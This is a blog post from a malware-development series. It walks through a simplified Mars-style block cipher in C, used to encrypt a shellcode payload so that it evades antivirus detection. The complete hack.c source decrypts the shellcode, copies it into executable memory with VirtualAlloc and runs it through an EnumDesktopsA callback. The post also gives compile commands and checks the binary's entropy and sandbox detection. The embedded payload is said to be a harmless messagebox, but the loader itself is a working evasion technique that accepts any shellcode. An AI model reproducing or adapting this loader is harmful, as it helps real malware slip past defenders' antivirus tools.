Hello, cybersecurity enthusiasts and white hat hackers!

In this post, I continue my exploration of symmetric-key block ciphers for encrypting and decrypting payloads to evade antivirus (AV) detection. Today I will try to implement the Mars cipher.

Mars

Mars is one of those “legendary but niche” block ciphers you only see in CTFs, crypto research, or when someone wants to confuse the hell out of an analyst. Designed by IBM’s top crypto minds in the late 90s, Mars was IBM’s entry into the AES contest - the same race that gave the world Rijndael (what we now know as AES). Unlike most block ciphers of the time, Mars wasn’t content to stick with traditional Feistel networks or pure substitution-permutation networks (SPNs). Instead, it mashed both worlds together, with a touch of mathematical brutality and hardware paranoia.

practical example

Let’s create a simple malware sample that encrypts and decrypts its payload with Mars-style logic.

Mars always operates on 128 bits (16 bytes) at a time. It divides that block into four 32-bit words. So if you feed it this:

unsigned char block[16] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41
};

Internally, you get:

uint32_t a, b, c, d;
memcpy(&a, block, 4);
memcpy(&b, block + 4, 4);
memcpy(&c, block + 8, 4);
memcpy(&d, block + 12, 4);
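Note that memcpy copies bytes in host order, so the word values depend on the machine's endianness (on little-endian x86, the first word of the block above is 0xe48148fc). A minimal sketch of an explicit little-endian load, assuming you want the same words on any host; load_le32 and block_to_words are hypothetical helpers, not part of hack.c:

```c
#include <stdint.h>

/* Hypothetical helper (not in hack.c): read 4 bytes as a little-endian
   32-bit word, independent of the host byte order. */
static uint32_t load_le32(const uint8_t *p) {
  return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
         ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Split a 16-byte block into four 32-bit words. */
static void block_to_words(const uint8_t block[16], uint32_t w[4]) {
  for (int i = 0; i < 4; ++i)
    w[i] = load_le32(block + 4 * i);
}
```

For the sample block, this gives 0xe48148fc, 0xfffffff0, 0x0000d0e8 and 0x41514100.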

Before any rounds, Mars adds key material to each word - just to scramble the input right away. The key schedule produces a set of round keys (RK[]):

a += RK[0];
b += RK[1];
c += RK[2];
d += RK[3];

This immediately breaks any simple relationship between input and output, a trick modern ciphers call “whitening”.
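Whitening is trivially reversible because addition modulo 2^32 is undone by subtracting the same key words. A small sketch of that round trip; whiten_add and whiten_sub are illustrative names, not functions from hack.c:

```c
#include <stdint.h>

/* Input whitening: add one key word to each state word (mod 2^32). */
static void whiten_add(uint32_t s[4], const uint32_t k[4]) {
  for (int i = 0; i < 4; ++i) s[i] += k[i];
}

/* Inverse: subtract the same key words; unsigned wrap-around cancels out. */
static void whiten_sub(uint32_t s[4], const uint32_t k[4]) {
  for (int i = 0; i < 4; ++i) s[i] -= k[i];
}
```

For example, 0xfffffff0 + 0x20 wraps around to 0x10, and 0x10 - 0x20 wraps back to 0xfffffff0.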

The next step is the main round operations (the Mars core). Here the block goes through a gauntlet of 32 rounds. In the original Mars, the first 8 and last 8 rounds are unkeyed “mixing” rounds and the 16 in the middle are the keyed “cryptographic core”; this simplified demo uses the same keyed step for all 32. Each loop iteration performs four steps, so it updates all four state words once, using a custom mixing transformation:

for (int i = 0; i < 32; i += 4) {
  t = ROTL32(a,13) ^ ROTL32(a,23) ^ a; t += RK[i+4];
  b ^= t; b = ROTL32(b,13);

  t = ROTL32(b,13) ^ ROTL32(b,23) ^ b; t += RK[i+5];
  c ^= t; c = ROTL32(c,13);

  t = ROTL32(c,13) ^ ROTL32(c,23) ^ c; t += RK[i+6];
  d ^= t; d = ROTL32(d,13);

  t = ROTL32(d,13) ^ ROTL32(d,23) ^ d; t += RK[i+7];
  a ^= t; a = ROTL32(a,13);
}

This simplified round combines modular addition, XOR, and fixed rotations (by 13 and 23 bits). The original Mars core also uses multiplication and data-dependent rotations, which this demo leaves out. Here the S-box only comes into play during the key schedule.
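The round step shown above can also be written with small functions instead of macros. This is a minimal sketch; the names rotl32, mix and round_step are illustrative and do not appear in hack.c. The rotation masks its count, so a rotation by 0 does not turn into an undefined shift by 32:

```c
#include <stdint.h>

/* Rotate left by n bits; masking keeps both shift counts in 0..31. */
static uint32_t rotl32(uint32_t x, unsigned n) {
  n &= 31;
  return (x << n) | (x >> ((32 - n) & 31));
}

/* Mixing function from the post: M(x) = (x <<< 13) ^ (x <<< 23) ^ x */
static uint32_t mix(uint32_t x) {
  return rotl32(x, 13) ^ rotl32(x, 23) ^ x;
}

/* One step of the simplified round: `src` and a round key modify `dst`. */
static uint32_t round_step(uint32_t dst, uint32_t src, uint32_t rk) {
  uint32_t t = mix(src) + rk;   /* modular addition of the round key */
  return rotl32(dst ^ t, 13);   /* XOR into the target word, then rotate */
}
```

As a quick check, mix(1) sets bits 0, 13 and 23, which is 0x00802001.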

After all rounds, Mars applies output whitening (another key-mixing step, this time a subtraction):

a -= RK[36];
b -= RK[37];
c -= RK[38];
d -= RK[39];

Finally, reassemble the block: put the four 32-bit words back into a 16-byte block:

memcpy(block, &a, 4);
memcpy(block+4, &b, 4);
memcpy(block+8, &c, 4);
memcpy(block+12, &d, 4);

So the encryption function looks like this:

void mars_encrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[0]; b += RK[1]; c += RK[2]; d += RK[3];
  for (int i = 0; i < 32; i += 4) {
    t = M(a) + RK[i+4];
    b ^= t; b = ROTL32(b, 13);
    t = M(b) + RK[i+5];
    c ^= t; c = ROTL32(c, 13);
    t = M(c) + RK[i+6];
    d ^= t; d = ROTL32(d, 13);
    t = M(d) + RK[i+7];
    a ^= t; a = ROTL32(a, 13);
  }
  a -= RK[36]; b -= RK[37]; c -= RK[38]; d -= RK[39];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

What about decryption?

You just run everything in reverse: undo output whitening, invert the core rounds, then undo input whitening. The structure allows for perfect reversibility:

void mars_decrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[36]; b += RK[37]; c += RK[38]; d += RK[39];
  for (int i = 32-4; i >= 0; i -= 4) {
    t = M(d) + RK[i+7];
    a = ROTR32(a, 13) ^ t;
    t = M(c) + RK[i+6];
    d = ROTR32(d, 13) ^ t;
    t = M(b) + RK[i+5];
    c = ROTR32(c, 13) ^ t;
    t = M(a) + RK[i+4];
    b = ROTR32(b, 13) ^ t;
  }
  a -= RK[0]; b -= RK[1]; c -= RK[2]; d -= RK[3];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}
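To see why the reversed loop works, it helps to look at a single step in isolation. The sketch below is only an illustration (rol, ror, m_word, step_fwd and step_inv are hypothetical names): the forward step XORs and then rotates left, so the inverse rotates right first and then XORs the same value away. The source word must be the one the forward step used, which is why decryption walks the words in the opposite order.

```c
#include <stdint.h>

static uint32_t rol(uint32_t x, unsigned n) { n &= 31; return (x << n) | (x >> ((32 - n) & 31)); }
static uint32_t ror(uint32_t x, unsigned n) { n &= 31; return (x >> n) | (x << ((32 - n) & 31)); }
static uint32_t m_word(uint32_t x) { return rol(x, 13) ^ rol(x, 23) ^ x; }

/* Forward step: dst' = ROTL(dst ^ (M(src) + rk), 13) */
static uint32_t step_fwd(uint32_t dst, uint32_t src, uint32_t rk) {
  return rol(dst ^ (m_word(src) + rk), 13);
}

/* Inverse step: undo the rotation, then XOR with the same M(src) + rk. */
static uint32_t step_inv(uint32_t dst, uint32_t src, uint32_t rk) {
  return ror(dst, 13) ^ (m_word(src) + rk);
}
```

Applying step_inv to the output of step_fwd with the same src and rk returns the original word.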

As usual, I used PKCS#7 padding logic so that payloads of any size work:

size_t pkcs7_pad(const unsigned char* in, size_t len, unsigned char* out) {
  size_t rem = len % BLOCK_SIZE;
  size_t padlen = BLOCK_SIZE - rem;
  size_t total = len + padlen;
  memcpy(out, in, len);
  for (size_t i = 0; i < padlen; ++i)
    out[len + i] = (unsigned char)padlen;
  return total;
}

size_t pkcs7_unpad(const unsigned char* in, size_t len) {
  if (len == 0) return 0;
  unsigned char pad = in[len-1];
  if (pad > BLOCK_SIZE) return len;
  for (size_t i = 0; i < pad; ++i)
    if (in[len-1-i] != pad) return len;
  return len - pad;
}
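One detail that is easy to miss: PKCS#7 always appends between 1 and BLOCK_SIZE bytes, so an input that is already block-aligned grows by one full block. A small sketch of how the output buffer could be sized; pkcs7_padded_len is a hypothetical helper, not part of the code above:

```c
#include <stddef.h>

#define BLOCK_SIZE 16

/* Hypothetical helper: number of bytes pkcs7_pad() writes for `len` input
   bytes. A block-aligned input still gets a full extra block of padding. */
static size_t pkcs7_padded_len(size_t len) {
  return (len / BLOCK_SIZE + 1) * BLOCK_SIZE;
}
```

For the 313-byte payload used in this post, this gives 320 bytes (7 bytes of padding); for a 16-byte input it gives 32.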

How’s this different from Feistel?

In classic Feistel ciphers (like DES), you split the block into two halves, process one half with the round function, then swap. Mars works on four words instead of two halves: each step uses one word to update the others (the original design is usually described as a generalized, “type-3” Feistel network). Its operations are not just Feistel swaps; they mix, rotate, add, and XOR everything in sight, so diffusion is stronger and the structure is less predictable.
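For contrast, here is a minimal sketch of one classic two-half Feistel round. The round function toy_f is a made-up placeholder for illustration only (it is not the DES round function), and all names here are assumptions:

```c
#include <stdint.h>

/* Toy round function F: an assumption for illustration, not from DES. */
static uint32_t toy_f(uint32_t half, uint32_t rk) {
  return ((half << 5) | (half >> 27)) + rk;
}

/* One classic Feistel round on halves L and R:
   (L, R) -> (R, L ^ F(R, k)) */
static void feistel_round(uint32_t *l, uint32_t *r, uint32_t rk) {
  uint32_t t = *l ^ toy_f(*r, rk);
  *l = *r;
  *r = t;
}

/* The inverse reuses the same F, so F itself never has to be invertible. */
static void feistel_round_inv(uint32_t *l, uint32_t *r, uint32_t rk) {
  uint32_t t = *r ^ toy_f(*l, rk);
  *r = *l;
  *l = t;
}
```

The Mars-style step in this post follows the same idea (XOR a keyed function of one word into another), but rotates through four words instead of swapping two halves.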

The full source code (Mars with PKCS#7) is in hack.c:

/*
* hack.c
* encrypt/decrypt payload 
* with padding via Mars
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/07/16/malware-cryptography-43.html
*/
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define BLOCK_SIZE 16
#define KEY_SIZE 16   // 128 bits
#define MARS_ROUNDS 32

// simple S-box: S[i] = i (not secure, for PoC/demo only)
static const uint32_t S[512] = {
  0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15,
  16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
  32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
  48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
  64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
  80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
  96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
  112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
  128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
  144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
  160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
  176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
  192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
  208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
  224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
  240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,
  256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,
  272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,
  288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,
  304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,
  320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,
  336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,
  352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,
  368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,
  384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,
  400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,
  416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,
  432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,
  448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,
  464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,
  480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,
  496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511
};

// Mars key schedule
static uint32_t RK[40];

#define ROTL32(x,n) (((x) << (n)) | ((x) >> (32-(n))))
#define ROTR32(x,n) (((x) >> (n)) | ((x) << (32-(n))))

void mars_key_schedule(const uint8_t userkey[KEY_SIZE]) {
  uint32_t T[15];
  int i;
  for (i = 0; i < 4; ++i) {
    T[i] = ((uint32_t)userkey[4*i]) | ((uint32_t)userkey[4*i+1] << 8) |
         ((uint32_t)userkey[4*i+2] << 16) | ((uint32_t)userkey[4*i+3] << 24);
  }
  for (; i < 15; ++i) T[i] = 0;
  for (i = 0; i < 40; ++i) {
    RK[i] = S[(T[(i+0)%15] ^ T[(i+1)%15] ^ T[(i+8)%15] ^ T[(i+12)%15] ^ i) & 0x1FF];
  }
}
#define M(x) (ROTL32(x, 13) ^ ROTL32(x, 23) ^ (x))

void mars_encrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[0]; b += RK[1]; c += RK[2]; d += RK[3];
  for (int i = 0; i < 32; i += 4) {
    t = M(a) + RK[i+4];
    b ^= t; b = ROTL32(b, 13);
    t = M(b) + RK[i+5];
    c ^= t; c = ROTL32(c, 13);
    t = M(c) + RK[i+6];
    d ^= t; d = ROTL32(d, 13);
    t = M(d) + RK[i+7];
    a ^= t; a = ROTL32(a, 13);
  }
  a -= RK[36]; b -= RK[37]; c -= RK[38]; d -= RK[39];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

void mars_decrypt_block(const uint8_t in[16], uint8_t out[16]) {
  uint32_t a, b, c, d, t;
  memcpy(&a, in, 4); memcpy(&b, in+4, 4); memcpy(&c, in+8, 4); memcpy(&d, in+12, 4);
  a += RK[36]; b += RK[37]; c += RK[38]; d += RK[39];
  for (int i = 32-4; i >= 0; i -= 4) {
    t = M(d) + RK[i+7];
    a = ROTR32(a, 13) ^ t;
    t = M(c) + RK[i+6];
    d = ROTR32(d, 13) ^ t;
    t = M(b) + RK[i+5];
    c = ROTR32(c, 13) ^ t;
    t = M(a) + RK[i+4];
    b = ROTR32(b, 13) ^ t;
  }
  a -= RK[0]; b -= RK[1]; c -= RK[2]; d -= RK[3];
  memcpy(out, &a, 4); memcpy(out+4, &b, 4); memcpy(out+8, &c, 4); memcpy(out+12, &d, 4);
}

size_t pkcs7_pad(const unsigned char* in, size_t len, unsigned char* out) {
  size_t rem = len % BLOCK_SIZE;
  size_t padlen = BLOCK_SIZE - rem;
  size_t total = len + padlen;
  memcpy(out, in, len);
  for (size_t i = 0; i < padlen; ++i)
    out[len + i] = (unsigned char)padlen;
  return total;
}

size_t pkcs7_unpad(const unsigned char* in, size_t len) {
  if (len == 0) return 0;
  unsigned char pad = in[len-1];
  if (pad > BLOCK_SIZE) return len;
  for (size_t i = 0; i < pad; ++i)
    if (in[len-1-i] != pad) return len;
  return len - pad;
}

int main() {
  uint8_t key[KEY_SIZE] = {
    0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77,
    0x6d, 0x65, 0x6f, 0x77, 0x6d, 0x65, 0x6f, 0x77
  };

  unsigned char payload[] = {
    0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
    0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
    0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
    0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
    0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
    0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
    0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
    0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
    0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
    0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
    0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
    0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
    0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
    0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
    0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
    0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
    0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
    0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
    0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
    0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
  };
  size_t payload_len = sizeof(payload);

  uint8_t key_schedule[KEY_SIZE];
  memcpy(key_schedule, key, KEY_SIZE);
  mars_key_schedule(key_schedule);

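  // PKCS#7 always appends 1..BLOCK_SIZE bytes, so reserve a full extra block
  // when payload_len is already a multiple of BLOCK_SIZE
  size_t padded_len = (payload_len / BLOCK_SIZE + 1) * BLOCK_SIZE;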
  unsigned char *padded = calloc(1, padded_len);
  unsigned char *encrypted = calloc(1, padded_len);
  unsigned char *decrypted = calloc(1, padded_len);

  size_t used = pkcs7_pad(payload, payload_len, padded);

  for (size_t i = 0; i < used; i += BLOCK_SIZE)
    mars_encrypt_block(padded + i, encrypted + i);

  for (size_t i = 0; i < used; i += BLOCK_SIZE)
    mars_decrypt_block(encrypted + i, decrypted + i);

  size_t unpadded = pkcs7_unpad(decrypted, used);

  printf("original:\n");
  for (size_t i = 0; i < payload_len; i++) printf("%02x ", payload[i]);
  printf("\n");

  printf("encrypted:\n");
  for (size_t i = 0; i < used; i++) printf("%02x ", encrypted[i]);
  printf("\n");

  printf("decrypted:\n");
  for (size_t i = 0; i < unpadded; i++) printf("%02x ", decrypted[i]);
  printf("\n");

  LPVOID mem = VirtualAlloc(NULL, unpadded, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, decrypted, unpadded);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);

  free(padded); free(encrypted); free(decrypted);
  return 0;
}

As you can see, I used the usual meow-meow messagebox payload for encryption:

unsigned char payload[] = {
  0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
  0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
  0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
  0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
  0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
  0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
  0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
  0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
  0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
  0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
  0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
  0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
  0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
  0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
  0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
  0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
  0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
  0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
  0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
  0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
  };

demo

Let’s see everything in action. Compile it:

x86_64-w64-mingw32-gcc hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Then run it on the victim’s machine (a Windows 10 VM in my case):

.\hack.exe

As you can see, everything worked perfectly! =^..^=

Let’s upload this to ANY.RUN:

IoC:

https://app.any.run/tasks/1fbcb806-6656-4c41-8a9d-3eb19a8d781a

As you can see, ANY.RUN does not flag it as malicious, but I think that is because the payload is harmless: it is just the meow-meow messagebox.

Shannon entropy:

python3 entropy.py -f hack.exe

As you can see, the entropy of the .text section is 6.240499.

Thanks to ANY.RUN for the API!

Mars never got to be the AES winner (that prize went to Rijndael), but it’s still respected for its forward-looking design. It’s not commonly found in mainstream crypto stacks, and that’s exactly why you sometimes see it in advanced malware or CTF challenges.

I hope this post is useful for C/C++ programmers, raises awareness of this interesting encryption technique among blue teamers, and adds a weapon to the red teamers’ arsenal.

run shellcode via EnumDesktopsA
Malware and cryptography 1
ANY.RUN
ANY.RUN: hack.exe
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine.